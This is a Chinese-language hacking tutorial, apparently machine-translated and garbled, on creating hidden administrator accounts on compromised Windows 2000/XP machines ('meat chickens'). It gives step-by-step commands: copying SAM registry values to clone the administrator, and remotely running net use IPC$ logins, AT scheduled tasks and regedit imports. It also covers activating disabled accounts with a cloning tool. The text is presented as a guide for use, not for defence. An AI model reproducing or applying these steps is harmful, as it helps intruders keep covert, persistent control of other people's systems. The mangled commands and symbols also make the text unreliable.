1。如何在一个图形界面建立一个隐藏的超级用户
在图形界面下,它适用于本地或3389端服务的鸡,上面提到的是很好的,但相当复杂。它也需要psu.exe(使程序运行在系统用户的身份)。如果我们想把它上传到肉鸡,我们需要上传psu.exe.the方法我说不去psu.exe程序。由于Windows2000有两个注册表编辑:REGEDIT.EXE并regedt32.exe.in XP REGEDIT.EXE和regedt32.exe实际上是一个程序,当核心价值的权利进行修改,右键一点;权限;修改。为REGEDIT.EXE,我想你们都很熟悉,但无法设置注册表键的权限,和regedt32.exe设置有权限的注册表项的最大优势。NT / 2000 / XP的帐户信息是所有注册表的hkey_local_machinesamsam键下,但其他用户没有权利,除了我们的视图的信息二系统。因此,我第一次使用regedt32.exe来我把山姆完全控制的关键,和权限。这允许你读取和写入信息在山姆的关键。具体步骤如下:
1,假设我们基于超级用户管理员登录到终端服务的肉鸡。首先,我们在命令行或帐户管理器下建立帐户:黑客$,我在命令行下设置了这个帐户。
NET用户黑客$ 1234 添加
2。在开始/运行输入:Regedt32.exe回到运行regedt32.exe。
3、点权限;窗口稍后会弹出。
添加到我的登录帐户添加到安全吧,我是管理员身份登录的,所以我将加入管理员,并设置权限为完全控制;它需要解释:最好的方法是添加组你登录或帐户,而不是修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏的超级用户被建立,然后删除账户添加。
4,然后点开始;具有运行;;;;进入regedit.exe回归,启动注册表编辑器regedit.exe.open关键:
hkey_local_maichinesamsamdomainsaccountusernameshacker $
5、黑客美元,00000 409,hacker.reg,409.reg,00000 1f4.reg 1F4衍生,这几个分别获得编辑记事本文件,关键00000 1F4超级用户对应的f;价值复制,并支付相应的黑客00000美元409键下;f值;然后00000409.reg合并hacker.reg。
6,在命令行下执行网络用户黑客,删除用户黑客:
NET用户黑客
7、刷新F5在REGEDIT.EXE窗口,然后文件-导入注册表文件导入到注册表修改hacker.reg
8。在这里,隐藏的超级用户的黑客为已建成,然后REGEDIT.EXE是封闭的,hkey_local_machinesamsam右键变回在regedt32.exe窗口(只要你删除添加的帐户管理员)。
9、注意:超级用户隐藏的完成,在这个用户帐户经理看到黑客美元,在命令行;净user指挥看不见,但在超级用户的建立,它不能更改密码,如果你使用网络的用户命令更改密码的黑客美元,然后客户经理也会看到隐藏的超级用户,不能被删除。
两。如何建立隐藏的超级用户远程命令行下
在这里使用的命令,因为计划任务所产生的是在系统的身份运行,所以它也不是用于psu.exe程序。为了能够使用AT命令,肉鸡必须计划服务。如果没有打开,可以通过netsvc.exe或sc.exe彩带意味着远程启动。当然,它的方法也是可以接受的,只要我们能开始计划服务。
命令行模式下,你可以使用连接的各种方式,如1433端口连接MSSQL与返回,或使用telnet服务,只要你得到一个cmdshell运行命令。
1,首先找到一个肉鸡,以及如何找到这不是我在这里说的主题。让我们假设我们首先找到一个超级用户管理员,密码是12345678。现在我们开始建立一个隐藏的超级用户命令行下。(在我的主机的例子是一台主机的局域网,我把它放在IP地址13.50.97.238,在互联网上,而不是谴责,避免干扰正常的IP。)
2、首先建立与肉鸡的连接,该命令是:使用网络13.50.97.238ipc $ 12345678 /用户:管理员
3,使用AT指令在肉鸡上建立一个用户(如果服务没有启动,可netsvc.exe或sc.exe温迪远程启动):
在13.50.97.238中午12时51分C: winntsystem32net.exe用户黑客1234美元/加
此用户名添加到$字符中。这是因为NET用户在添加$符号后不会在命令行下显示用户,但可以在帐户管理器中看到它。
4,还出口hkey_local_machinesamsamdomainsaccountusers关键值和命令:
在13.50.97.238 12:55 C: winntregedit.exe / E hacker.reg
hkey_local_machinesamsamdomainsaccountusers
/ E的REGEDIT.EXE参数,并在_local_machinesamsamdomainsaccountusers关键必须结束。必要时,C: winntregedit.exe / E hacker.reg hkey_local_machinesamsamdomainsaccountusers可以用引号。
5,对肉鸡的hacker.reg下载用记事本打开编辑命令如下机器:
复制13.50.97.238admin system32hacker.reg美元C: hacker.reg
修改后的方法已在图形世界中引入,并没有在这里介绍。
6、然后复制编辑hacker.reg回肉鸡
复制C: hacker.reg 13.50.97.238admin system32hacker1.reg美元
7、检查时间:肉鸡净时间13.50.97.238然后删除的命令用户黑客美元:
在13.50.97.238在13:40网用户黑客$ /删除
8。验证是否删除了黑客$:使用
使用13.50.97.238 /删除断开与肉鸡。
使用13.50.97.238ipc $ 1234 /用户:黑客$ 与美元帐户黑客肉鸡,和连接不能被删除。
9、建立与肉鸡的连接:使用13.50.97.238ipc $ 12345678 /用户:管理员
你的肉时,使用AT指令复制到肉鸡肉鸡hacker1.reg注册表:
在13.50.97.238在13 C: / S hacker1.reg winntregedit.exe
参数/ s的REGEDIT.EXE指安静模式。
10,确认黑客$已经建立,该方法是相同的,以验证是否黑客美元被删除。
11,验证用户黑客是否有读、写、删除的权限,如果你不担心,你也可以验证是否可以建立其他帐户。
12, 11,我们可以得出结论,用户黑客$拥有超级用户特权,因为当我首先用AT命令构建它时,我是一个普通用户,但现在我有权远程读取、写入和删除。
三。如果肉鸡没有3389端服务,我不想使用命令行,你会怎么做
在这种情况下,你也可以使用一个接口来创建一个隐藏的超级用户的肉鸡。因为REGEDIT.EXE和regedt32.exe有连接网络注册表的功能,你可以使用regedt32.exe来设置远程主机的注册表键的权限,并与regedit.exe.the客户经理编辑远程注册表也有一个功能,连接到另一台计算机,你可以使用帐户管理器来创建和删除远程主机的帐户,具体步骤是类似上面的,我说的不多,但速度真的是难以忍受的。
有两个前提:1、先用净用鸡ipipc $ 密码/用户:超级用户名的建立与远程主机的连接,然后我们可以用REGEDIT.EXE Regedt32.exe及客户经理远程主机连接。
2、远程主机必须开启远程注册表服务(如果不打开,你也可以打开远程,因为你有超级用户的密码)。
四。禁用帐户建立隐藏的超级用户
1,我想看看哪些用户被谨慎的管理员禁止。一般来说,一些管理者通常会禁用安全原因,客人当然会禁止其他用户。在图形界面很容易,只要客户经理,你可以看到一个红色的叉在帐户被禁用;而在命令行上,我不认为一个好的方式,可以只能在命令行中使用用户:净;用户名;逐一检查用户是否被禁用。
2。在这里,我们假设用户黑客被管理员禁用。首先,我用超级用户组,ca.exe温迪克隆程序,用户黑客克隆是残疾人进入超级用户(克隆,禁用用户的黑客会自动激活):ca.exe肉鸡IP管理员超级用户密码hacher密码hacher。
